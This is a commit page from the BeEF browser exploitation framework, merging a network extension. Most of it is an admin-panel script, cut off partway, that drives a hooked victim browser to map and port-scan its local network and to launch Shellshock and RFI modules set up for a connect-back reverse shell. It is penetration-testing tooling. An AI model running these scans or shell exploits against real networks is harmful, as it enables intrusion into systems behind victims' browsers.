Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'network_extension' of https://github.com/bcoles/beef into bcoles-network_extension

Browse Source
This commit is contained in:
antisnatchor
2015-02-03 15:22:33 +01:00
parent 6809ec9914 7e3ee5fc50
commit 23cf229dad
54 changed files with 2353 additions and 78 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
Gemfile
View File

@@ -41,6 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns", "0.7.0" # DNS extension
gem "geoip" # geolocation support
gem "dm-serializer" # network extension
# For running unit tests
if ENV['BEEF_TEST']

7
core/main/handlers/browserdetails.rb
View File

@@ -177,6 +177,13 @@ module BeEF
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
if config.get("beef.extension.network.enable") == true
if proxy_server =~ /^([\d\.]+):([\d]+)$/
print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy', :cid => 'init')
r.save
end
end
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end

2
extensions/admin_ui/api/handler.rb
View File

@@ -33,7 +33,7 @@ module API
#NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
ux = %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/tabs/ZombieTabNetwork.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
global_js = esapi + ux + panel

64
extensions/admin_ui/media/css/base.css
View File

@@ -93,6 +93,70 @@
padding-top: 3px;
}
/*
* Network Panel
****************************************/
.network-host-ctxMenu-config {
background-image: url(../images/icons/tools.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-host {
background-image: url(../images/icons/pc.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-network {
background-image: url(../images/icons/network.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-web {
background-image: url(../images/icons/web.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-router {
background-image: url(../images/icons/router.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-fingerprint {
background-image: url(../images/icons/magnifier.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-cors {
background-image: url(../images/icons/cors.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-shellshock {
background-image: url(../images/icons/shellshock.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-php {
background-image: url(../images/icons/php.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
/*
* Ext.beef.msg
****************************************/

BIN
extensions/admin_ui/media/images/icons/adapter.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
extensions/admin_ui/media/images/icons/cors.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
extensions/admin_ui/media/images/icons/magnifier.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
extensions/admin_ui/media/images/icons/network.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 45 KiB

BIN
extensions/admin_ui/media/images/icons/pc.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 2.5 KiB

After

Width:  |  Height:  |  Size: 1.8 KiB

BIN
extensions/admin_ui/media/images/icons/php.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
extensions/admin_ui/media/images/icons/router.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.0 KiB

BIN
extensions/admin_ui/media/images/icons/shellshock.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.8 KiB

BIN
extensions/admin_ui/media/images/icons/tools.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.3 KiB

BIN
extensions/admin_ui/media/images/icons/web.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.7 KiB

3
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -35,7 +35,8 @@ WelcomeTab = function() {
<li><img alt='' src='media/images/icons/red.png' unselectable='on'> The command module does not work against this target</li></ul><br />\
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>XssRays:</span> The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Rider:</span> The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li></ul><br />\
Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Network:</span> The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.</li></ul><br /> \
<p>You can also right-click a hooked browser to open a context-menu with additional functionality:</p><br /> \
<ul style=\"margin-left:15px;\">\
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Tunneling Proxy:</span> The Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". \

26
extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
View File

@@ -9,27 +9,29 @@ ZombieTab = function(zombie) {
log_tab = new ZombieTab_LogTab(zombie);
commands_tab = new ZombieTab_Commands(zombie);
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
ipec_tab = new ZombieTab_IpecTab(zombie);
autorun_tab = new ZombieTab_Autorun(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
ipec_tab = new ZombieTab_IpecTab(zombie);
autorun_tab = new ZombieTab_Autorun(zombie);
network_tab = new ZombieTab_Network(zombie);
ZombieTab.superclass.constructor.call(this, {
id:"current-browser",
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
title: "Current Browser",
title: "Current Browser",
autoScroll: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
listeners:{
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
}
}
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab, network_tab],
listeners:{
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
}
}
});
};

822
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js Normal file
View File

@@ -0,0 +1,822 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
* The Network tab panel for the selected zombie browser.
* Loaded in /ui/panel/index.html
*/
ZombieTab_Network = function(zombie) {
// The status bar.
var commands_statusbar = new Beef_StatusBar('network-bbar-zombie-'+zombie.session);
// RESTful API token
var token = beefwui.get_rest_token();
// get module ID from name
var get_module_id = function(name){
var id = "";
$jwterm.ajax({
type: 'GET',
url: "/api/modules/search/" + name + "?token=" + token,
async: false,
processData: false,
success: function(data){
id = data.id;
},
error: function(){
commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'");
}
});
return id;
}
/*
* The panel that displays all identified network services grouped by host
********************************************/
var hosts_panel_store = new Ext.ux.data.PagingJsonStore({
storeId: 'network-host-store-zombie-'+zombie.session,
proxy: new Ext.data.HttpProxy({
url: '/api/network/hosts/'+zombie.session+'?token='+token,
method: 'GET'
}),
remoteSort: false,
autoDestroy: true,
autoLoad: false,
root: 'hosts',
fields: ['id', 'ip', 'hostname', 'type', 'os', 'mac'],
sortInfo: {field: 'ip', direction: 'ASC'}
});
var req_pagesize = 50;
var hosts_panel_bbar = new Ext.PagingToolbar({
pageSize: req_pagesize,
store: hosts_panel_store,
displayInfo: true,
displayMsg: 'Displaying network hosts {0} - {1} of {2}',
emptyMsg: 'No hosts to display'
});
var hosts_panel_grid = new Ext.grid.GridPanel({
id: 'network-host-grid-zombie-'+zombie.session,
store: hosts_panel_store,
bbar: hosts_panel_bbar,
border: false,
loadMask: {msg:'Loading network hosts...'},
viewConfig: {
forceFit: true
},
view: new Ext.grid.GridView({
forceFit: true,
emptyText: "No hosts",
enableRowBody:true
}),
columns: [
{header: 'Id', width: 5, sortable: true, dataIndex: 'id', hidden:true},
{header: 'IP Address', width: 10, sortable: true, dataIndex: 'ip', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'Host Name', width: 10, sortable: true, dataIndex: 'hostname', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'Type', width: 20, sortable: true, dataIndex: 'type', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'Operating System', width: 10, sortable: true, dataIndex: 'os', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'MAC Address', width: 10, sortable: true, dataIndex: 'mac', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
],
listeners: {
rowclick: function(grid, rowIndex) {
var r = grid.getStore().getAt(rowIndex).data;
},
contextmenu: function(e, element, options) {
e.preventDefault();
},
containercontextmenu: function(view, e) {
e.preventDefault();
var emptygrid_menu = new Ext.menu.Menu({
items: [
{
text: 'Get Internal IP Address',
iconCls: 'network-host-ctxMenu-adapter',
handler: function() {
var mod_id = get_module_id("get_internal_ip_webrtc");
commands_statusbar.update_sending('Identifying zombie network adapters ...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Identify LAN Subnets',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("identify_lan_subnets");
commands_statusbar.update_sending('Identifying zombie LAN subnets ...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Discover Routers',
iconCls: 'network-host-ctxMenu-router',
handler: function() {
var mod_id = get_module_id("fingerprint_routers");
commands_statusbar.update_sending('Scanning commonly used local area network IP addresses for routers ...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "get_http_servers";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-config',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
if (!ip_range) {
commands_statusbar.update_fail('Cancelled');
return;
}
var mod_name = "get_http_servers";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
},{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "internal_network_fingerprinting";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-config',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
if (!ip_range) {
commands_statusbar.update_fail('Cancelled');
return;
}
var mod_name = "internal_network_fingerprinting";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "cross_origin_scanner";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-config',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
if (!ip_range) {
commands_statusbar.update_fail('Cancelled');
return;
}
var mod_name = "cross_origin_scanner";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
}]
});
emptygrid_menu.showAt(e.getXY());
},
rowcontextmenu: function(grid, rowIndex, e) {
e.preventDefault();
grid.getSelectionModel().selectRow(rowIndex);
if (!!grid.rowCtxMenu) {
grid.rowCtxMenu.destroy();
}
var record = grid.selModel.getSelected();
var ip = record.get('ip');
var class_c = ip.split(".")[0]+"."+ip.split(".")[1]+"."+ip.split(".")[2];
var ip_range = class_c+'.1-'+class_c+'.255';
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
text: 'Host ('+ip+')',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Network ('+class_c+'.0/24)',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
},{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
menu: {
xtype: 'menu',
items: [{
text: 'Host ('+ip+')',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Network ('+class_c+'.0/24)',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
menu: {
xtype: 'menu',
items: [{
text: 'Host ('+ip+')',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Network ('+class_c+'.0/24)',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
},{
text: 'Port Scan',
iconCls: 'network-host-ctxMenu-network',
menu: {
xtype: 'menu',
items: [{
text: 'Common Ports',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("port_scanner");
var ports = '21,22,23,25,80,81,443,445,1080,8080,8081,8090,8443,3000,3128,3389,3306,5432,6379,10000,10443';
commands_statusbar.update_sending('Port scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipHost":ip,"ports":ports}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Specify Ports',
iconCls: 'network-host-ctxMenu-config',
handler: function() {
var mod_id = get_module_id("port_scanner");
var ports = prompt("Enter ports to scan:", '1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088');
if (!ports) {
commands_statusbar.update_fail('Cancelled');
return;
}
commands_statusbar.update_sending('Port scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipHost":ip,"ports":ports}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
grid.rowCtxMenu.showAt(e.getXY());
},
afterrender: function(datagrid) {
datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
}
}
});
var hosts_panel = new Ext.Panel({
id: 'network-host-panel-zombie-'+zombie.session,
title: 'Hosts',
items:[hosts_panel_grid],
layout: 'fit',
listeners: {
activate: function(hosts_panel) {
hosts_panel.items.items[0].store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
}
}
});
/*
* The panel that displays all identified network services sorted by host
********************************************/
var services_panel_store = new Ext.ux.data.PagingJsonStore({
storeId: 'network-services-store-zombie-'+zombie.session,
proxy: new Ext.data.HttpProxy({
url: '/api/network/services/'+zombie.session+'?token='+token,
method: 'GET'
}),
remoteSort: false,
autoDestroy: true,
autoLoad: false,
root: 'services',
fields: ['id', 'proto', 'ip', 'port', 'type'],
sortInfo: {field: 'ip', direction: 'ASC'}
});
var req_pagesize = 50;
var services_panel_bbar = new Ext.PagingToolbar({
pageSize: req_pagesize,
store: services_panel_store,
displayInfo: true,
displayMsg: 'Displaying network services {0} - {1} of {2}',
emptyMsg: 'No services to display'
});
var services_panel_grid = new Ext.grid.GridPanel({
id: 'network-services-grid-zombie-'+zombie.session,
store: services_panel_store,
bbar: services_panel_bbar,
border: false,
loadMask: {msg:'Loading network services...'},
viewConfig: {
forceFit: true
},
view: new Ext.grid.GridView({
forceFit: true,
emptyText: "No services",
enableRowBody:true
}),
columns: [
{header: 'Id', width: 5, sortable: true, dataIndex: 'id', hidden:true},
{header: 'IP Address', width: 10, sortable: true, dataIndex: 'ip', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'Port', width: 5, sortable: true, dataIndex: 'port', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'Protocol', width: 5, sortable: true, dataIndex: 'proto', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
{header: 'Type', width: 20, sortable: true, dataIndex: 'type', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
],
listeners: {
rowclick: function(grid, rowIndex) {
var r = grid.getStore().getAt(rowIndex).data;
},
containercontextmenu: function(view, e) {
e.preventDefault();
},
contextmenu: function(e, element, options) {
e.preventDefault();
},
rowcontextmenu: function(grid, rowIndex, e) {
e.preventDefault();
grid.getSelectionModel().selectRow(rowIndex);
if (!!grid.rowCtxMenu) {
grid.rowCtxMenu.destroy();
}
var record = grid.selModel.getSelected();
var ip = record.get('ip');
var port = record.get('port');
var proto = record.get('proto');
grid.rowCtxMenu = new Ext.menu.Menu({
items: [{
text: 'Scan ('+ip+':'+port+'/'+proto+')',
iconCls: 'network-host-ctxMenu-host',
menu: {
xtype: 'menu',
items: [{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
handler: function() {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
handler: function() {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Shellshock Scan',
iconCls: 'network-host-ctxMenu-shellshock',
handler: function() {
var mod_id = get_module_id("shell_shock_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'RFI Scan',
iconCls: 'network-host-ctxMenu-php',
handler: function() {
var mod_id = get_module_id("rfi_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
dataType: 'json',
